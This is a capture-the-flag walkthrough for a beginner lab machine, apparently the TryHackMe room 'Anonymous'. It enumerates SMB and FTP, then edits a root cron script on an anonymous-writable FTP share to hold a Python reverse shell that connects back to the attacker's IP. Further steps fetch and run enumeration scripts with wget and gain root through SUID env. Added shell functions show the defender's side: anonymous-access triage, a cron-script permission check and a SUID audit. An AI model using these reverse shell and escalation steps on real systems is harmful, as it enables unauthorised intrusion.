Anonymous

Room info:

Try to get the two flags!  Root the machine and prove your understanding of the fundamentals! This is a virtual machine meant for beginners. Acquiring both flags will require some basic knowledge of Linux and privilege escalation methods.
For more information on Linux, check out https://tryhackme.com/room/zthlinux

Task 1 Pwn

Enumeration

As always, start with an initial Nmap scan:

nmap -sC -sV $target_ip -oA scan.content

After the scan we get output like this:

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.166.168
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: anonymous
|   NetBIOS computer name: ANONYMOUS\x00
|   Domain name: \x00
|   FQDN: anonymous
|_  System time: 2021-01-07T02:54:10+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-01-07T02:54:10
|_  start_date: N/A

With this you get the answers to the first, second and third questions of Task 1.

Now take note of the scan: Nmap discovered some interesting things.

The first is that FTP allows anonymous login (this will be useful later on).

SSH reveals that the machine is running Ubuntu, and SMB has been set up.

Now we reach the fourth question

There's a share on the user's computer.  What's it called?

We can get the share from the SMB ports (139 and 445).

I will show you two ways, one with NMAP and one with enum4linux.

If you did not know, Nmap can run scripts (NSE) that extend a scan and pull more information from your target(s).

By default Nmap ships with a set of scripts, and the flags to use them are

nmap --script=$script --script-args=$args (the --script-args part only if the script needs arguments)

(You can get more info here https://nmap.org/nsedoc/)

Let's use smb-enum-users, smb-enum-shares and smb-ls:

nmap -p 139,445 --script=smb-enum-users,smb-enum-shares,smb-ls $target_ip -oA smb-scan.content
---------------------------------------------------------------------------------------------
Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.128.142\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (anonymous server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.128.142\[REDACTED]: 
|     Type: STYPE_DISKTREE
|     Comment: My SMB Share Directory for Pics
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\[REDACTED]\[REDACTED]
|     Anonymous access: READ
|     Current user access: READ
|   \\10.10.128.142\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
| smb-enum-users: 
|   ANONYMOUS\[REDACTED] (RID: 1003)
|     Full name:   [REDACTED]
|     Description: 
|_    Flags:       Normal user account
| smb-ls: Volume \\10.10.128.142\[REDACTED]
| SIZE    TIME                 FILENAME
| <DIR>   2020-05-17T11:11:34  .
| <DIR>   2020-05-14T01:59:10  ..
| 42663   2020-05-12T00:43:42  [REDACTED].jpg
| 265188  2020-05-12T00:43:42  [REDACTED].jpeg
|_

As you can see, Nmap gives simple but fairly detailed output.

It shows us which shares are available and the users that have access to them, and smb-ls lists the contents of the shares we can access as guest.
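As an added example (my own, not part of this walkthrough and not an Nmap feature), here is a small shell function that reads Nmap's normal output and reports what the scan shows as reachable without credentials: the ftp-anon verdict and every share that smb-enum-shares lists with an "Anonymous access" level other than <none>. It is the kind of triage you would run over scan output when auditing your own hosts. The excerpt inside sample_scan is constructed in the shape of the output above, with a made-up address and share name.

```bash
#!/bin/sh
# Added example: triage of Nmap normal output for services that the scan shows
# as reachable without credentials. Not part of the walkthrough and not an Nmap
# feature; it only post-processes the text Nmap already printed.

# Reads Nmap normal output on stdin. Prints one line if ftp-anon reports an
# anonymous login, and one line per share that smb-enum-shares lists with an
# "Anonymous access" level other than <none>.
anonymous_access() {
    awk '
        # ftp-anon puts its verdict on the first line of its block
        /^\|[ _]ftp-anon: Anonymous FTP login allowed/ { print "ftp anonymous-login allowed" }

        # every NSE block starts with "| name:" (or "|_name:"); remember whether
        # the current block is smb-enum-shares
        /^\|[ _][a-z0-9-]+:/ { inshares = ($0 ~ /smb-enum-shares:/) }

        # share header line, e.g. "|   \\10.10.0.1\IPC$:" -> keep the share name
        inshares && /^\| +\\\\/ {
            share = $2
            sub(/:$/, "", share)     # drop the trailing colon
            sub(/.*\\/, "", share)   # keep what follows the last backslash
        }

        # "Anonymous access: <level>" belongs to the most recent share header
        inshares && $2 == "Anonymous" && $3 == "access:" && $4 != "<none>" {
            print "share " share " " $4
        }
    '
}

# Constructed excerpt in the shape of the scan above; the address and the
# share name are made up, print$ is kept as the "no anonymous access" case.
sample_scan() {
cat <<'EOF'
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.0.1\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.0.1\example-share:
|     Type: STYPE_DISKTREE
|     Comment: My SMB Share Directory for Pics
|     Anonymous access: READ
|     Current user access: READ
|   \\10.10.0.1\print$:
|     Type: STYPE_DISKTREE
|     Anonymous access: <none>
|_    Current user access: <none>
| smb-enum-users:
|   ANONYMOUS\someuser (RID: 1003)
EOF
}

# Usage on a real scan saved with -oA (example path):
#   anonymous_access < smb-scan.content.nmap
sample_scan | anonymous_access
```

On the constructed excerpt this prints three lines: the FTP anonymous login, IPC$ with READ/WRITE and the example share with READ; print$ is left out because its anonymous access is <none>. Run against a whole network's scan files it gives you the list of hosts where guest access is on, which is what you would want to close or at least know about.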

The second way to enumerate the SMB ports is with enum4linux. (If you do not have enum4linux you can get it from here https://github.com/CiscoCXSecurity/enum4linux).

Simply run enum4linux -a $target_ip

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.128.142
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 10.10.128.142    |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================= 
|    Nbtstat Information for 10.10.128.142    |
 ============================================= 
Looking up status of 10.10.128.142
        ANONYMOUS       <00> -         B <ACTIVE>  Workstation Service
        ANONYMOUS       <03> -         B <ACTIVE>  Messenger Service
        ANONYMOUS       <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ====================================== 
|    Session Check on 10.10.128.142    |
 ====================================== 
[+] Server 10.10.128.142 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 10.10.128.142    |
 ============================================ 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================= 
|    OS information on 10.10.128.142    |
 ======================================= 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.128.142 from smbclient: 
[+] Got OS info for 10.10.128.142 from srvinfo:
        ANONYMOUS      Wk Sv PrQ Unx NT SNT anonymous server (Samba, Ubuntu)
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ============================== 
|    Users on 10.10.128.142    |
 ============================== 
index: 0x1 RID: 0x3eb acb: 0x00000010 Account: [REDACTED]      Name: [REDACTED]       Desc: 

user:[[REDACTED]] rid:[0x3eb]

 ========================================== 
|    Share Enumeration on 10.10.128.142    |
 ========================================== 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        [REDACTED]      Disk      My SMB Share Directory for [REDACTED]
        IPC$            IPC       IPC Service (anonymous server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.128.142
//10.10.128.142/print$  Mapping: DENIED, Listing: N/A
//10.10.128.142/[REDACTED]    Mapping: OK, Listing: OK
//10.10.128.142/IPC$    [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ===================================================== 
|    Password Policy Information for 10.10.128.142    |
 ===================================================== 


[+] Attaching to 10.10.128.142 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] ANONYMOUS
        [+] Builtin

[+] Password Info for Domain: ANONYMOUS

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes 
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes 


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 =============================== 
|    Groups on 10.10.128.142    |
 =============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================== 
|    Users on 10.10.128.142 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2144577014-3591677122-2188425437
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\[REDACTED] (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-21-2144577014-3591677122-2188425437 and logon username '', password ''

S-1-5-21-2144577014-3591677122-2188425437-501 ANONYMOUS\nobody (Local User)

S-1-5-21-2144577014-3591677122-2188425437-513 ANONYMOUS\None (Domain Group)

S-1-5-21-2144577014-3591677122-2188425437-1003 ANONYMOUS\[REDACTED] (Local User)


 ============================================== 
|    Getting printer info for 10.10.128.142    |
 ============================================== 
No printers returned.

For the sake of space, I have removed some useless information from the output and left only the important bits. Your output will have a lot more information.

With this you get the answer to the fourth question of Task 1.

From the info we have gathered we can see that there is a share that we can access as a guest and one user.

To access the share we can use

smbclient '\\$target_ip\$share' (for guest; leave the password blank)
smbclient '\\$target_ip\$share' -U '$username%$password' (with credentials)
smbclient '\\10.10.128.142\[REDACTED]'
Enter WORKGROUP\users's password: (JUST LEAVE IT BLANK)
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun May 17 13:11:34 2020
  ..                                  D        0  Thu May 14 03:59:10 2020
  [REDACTED].jpg                          N    42663  Tue May 12 02:43:42 2020
  [REDACTED].jpeg                         N   265188  Tue May 12 02:43:42 2020

                20508240 blocks of size 1024. 13306640 blocks available
smb: \>

Type help to get more information about the commands you can use in smbclient.

There are two adorable pictures we can download; however, there isn't much we can get out of them with steghide, since they require a password.

Now let's turn our attention to FTP.

As previously shown by Nmap, we can log in to FTP as anonymous (big surprise there x0 )

ftp $target_ip
Connected to 10.10.128.142.
220 [REDACTED]'s FTP Server!
Name (10.10.128.142:magic): anonymous
331 Please specify the password.
Password: (LEAVE BLANK)
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts
226 Directory send OK.
ftp>

We can see that there is a scripts directory.

Let's get all the files and go through them. (For more information about FTP, type ? in the console or read https://www.cs.colostate.edu/helpdocs/ftp.html)

We get three files: clean.sh, removed_files.log and to_do.txt

cat to_do.txt
"I really need to disable the anonymous login...it's really not safe"

cat removed_files.log
Running cleanup script:  nothing to delete
(this line repeats about 20 times)

cat clean.sh
#!/bin/bash
tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi

Looking through them, we see that to_do.txt is just a simple note, while removed_files.log and clean.sh are tied together. Examining clean.sh, the script removes files in the /tmp directory and writes its log to /var/ftp/scripts/removed_files.log. (Note that its test "[ $tmp_files=0 ]" has no spaces around the =, so test sees a single non-empty word and always treats it as true; only the "nothing to delete" branch ever runs, which is why the log repeats that one line.) Judging by this, clean.sh is probably a cron job that runs once every few minutes, hours or days. (For more info about cron jobs see https://ostechnix.com/a-beginners-guide-to-cron-jobs/)
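As an added example (mine, not the room's clean.sh and not code from the walkthrough), the block below shows both sides of that observation. buggy_test reproduces the comparison from clean.sh and fixed_test the form it should have had; check_cron_script is the check a host owner would run over anything cron executes as root: it flags a script that is writable by group or others, or that lives in a directory that is, which is exactly the situation of a root cron job reading from an anonymous-writable FTP directory. The paths in the comments are the target's as shown on this page; the function itself works on any path.

```bash
#!/bin/sh
# Added example (mine, not the room's clean.sh and not code from the walkthrough).
# Two things a defender takes from the script above: why its log only ever says
# "nothing to delete", and the check that would have caught the actual weakness,
# a script run by root's cron from a directory that anonymous FTP users can write to.

# clean.sh tests `[ $tmp_files=0 ]`. With no spaces around '=' the shell hands
# test a single word (e.g. "5=0"), and test treats any single non-empty word as
# true, so the else branch can never run. Echoes what that buggy test decides.
buggy_test() {
    tmp_files="$1"
    if [ $tmp_files=0 ]; then echo true; else echo false; fi
}

# The comparison the script presumably meant: quoted variable, spaces around '='.
fixed_test() {
    tmp_files="$1"
    if [ "$tmp_files" = 0 ]; then echo true; else echo false; fi
}

# For a script that cron runs as root: flag the file and its directory if
# either is writable by group or others. Prints findings, returns 1 if any.
check_cron_script() {
    path="$1"
    found=0
    for p in "$path" "$(dirname "$path")"; do
        mode=$(ls -ld "$p" | cut -c1-10)      # e.g. -rwxrwxrwx or drwxrwxrwx
        case "$mode" in
            ?????w*|????????w*)               # group-write or other-write bit set
                echo "WRITABLE: $p ($mode)"
                found=1 ;;
        esac
    done
    return $found
}

# Usage (paths as on the target; /var/ftp/scripts is the anonymous FTP directory):
#   check_cron_script /var/ftp/scripts/clean.sh
```

On the target, check_cron_script /var/ftp/scripts/clean.sh would at least flag the scripts directory, which the FTP listing above shows as drwxrwxrwx; the file's own mode is not shown in the walkthrough. Either finding alone is enough: a root cron job must only execute files that root, and nobody else, can write.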

Reverse Shell

If clean.sh is a cron task, we can use it to get a reverse shell by simply modifying the file and uploading it back to the scripts folder.

Download the file, edit it with your text editor and grab a reverse shell from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md

My recommendations are Bash TCP, Perl and Python, since those are present by default in pretty much every Linux distro.

#!/bin/bash
export RHOST="YOUR-IP";export RPORT=PORT;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi

Then upload it, start nc -lvnp $PORT, and in about a minute you'll get a shell back.

Privilege Escalation

Once you're in, I suggest always stabilizing your shell:

  1. python -c 'import pty;pty.spawn("/bin/bash")'

  2. export TERM=xterm

  3. ^Z (Ctrl + Z) (to background the reverse shell)

  4. stty raw -echo;fg (this will put you back in your reverse shell)

[REDACTED]@anonymous:~$ ls
pics  user.txt
[REDACTED]@anonymous:~$ wc -c user.txt 
33 user.txt

You're dropped in the home directory of the main user in this challenge and can read the user.txt flag.

Now, since there is a script that deletes files in /tmp I'd suggest to go to

Let's get some scripts to enumerate our system.

Here are some suggestions:

Also worth checking out is https://github.com/jondonas/linux-exploit-suggester-2 (it won't be used in this challenge, but it will end up being useful in others).

Let's upload our files with

python3 -m http.server (on our machine)
wget http://$your_ip:$port/path/to/scripts (on remote target)
chmod +x script.sh
./script.sh | tee enum.txt

(Piping the last command into tee saves the output to a file, so you don't have to rerun the script if you lose the information; the downside is that it leaves traces of your steps on the target.)

The output of LinEnum is quite large so I'll just put in the important info that we need.

[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 35000 Jan 18  2018 /usr/bin/env

As we can see, /usr/bin/env has the SUID bit set and is owned by root. This means we can use it to get a root shell!
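Added example (mine, not from the walkthrough): the baseline check a host owner pairs with a finding like this one. It lists set-uid files under a tree and drops those on an allowlist, so a stray SUID copy of env stands out against the expected set (passwd, sudo and the like). The directory, file names and allowlist used in the test are constructed; the /etc/suid-allowlist.txt path in the usage comment is an assumed name, not a standard file.

```bash
#!/bin/sh
# Added example (not from the walkthrough): the baseline check a host owner
# pairs with a SUID finding like the one above. Paths, file names and the
# allowlist used here are constructed for the demonstration.

# Prints every set-uid regular file under the tree $1 whose path is not listed
# (one absolute path per line) in the allowlist file $2. Stays on one filesystem.
unexpected_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort | grep -v -x -F -f "$2" || true
}

# Same list as "mode owner path", which is what the analyst wants to see:
# a root-owned -rwsr-xr-x env outside the allowlist is the finding.
unexpected_suid_report() {
    unexpected_suid "$1" "$2" | while IFS= read -r f; do
        mode=$(ls -ld "$f" | cut -c1-10)
        owner=$(ls -ld "$f" | awk '{ print $3 }')
        printf '%s %s %s\n' "$mode" "$owner" "$f"
    done
}

# Usage on a real host (the allowlist path is an assumed name; populate it from
# a known-good build of the same image and keep it under change control):
#   unexpected_suid_report / /etc/suid-allowlist.txt
```

Anything the report prints is either a packaging change you expected, in which case it goes on the allowlist, or exactly the kind of thing LinEnum just surfaced here. Running it from cron and diffing against the previous run turns the one-off check into a detection.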

For how to exploit this, look up env on https://gtfobins.github.io/.

Simply run

env /bin/sh -p
or
env /bin/bash -p
[REDACTED]@anonymous:~$ whoami
[REDACTED]
[REDACTED]@anonymous:~$ env /bin/bash -p
bash-4.4# whoami
root

And you get root!

bash-4.4# cd /root
bash-4.4# ls
root.txt
bash-4.4# wc -c root.txt 
33 root.txt
bash-4.4#

Final thoughts

Anonymous is rated a medium-difficulty challenge; however, in my opinion it is quite easy to finish.

Just enumerate properly, and google anything you don't recognise and how it can be exploited.

A little side note: the user is part of the lxd group, which means that besides the env privesc we can use lxd to get a root shell too!
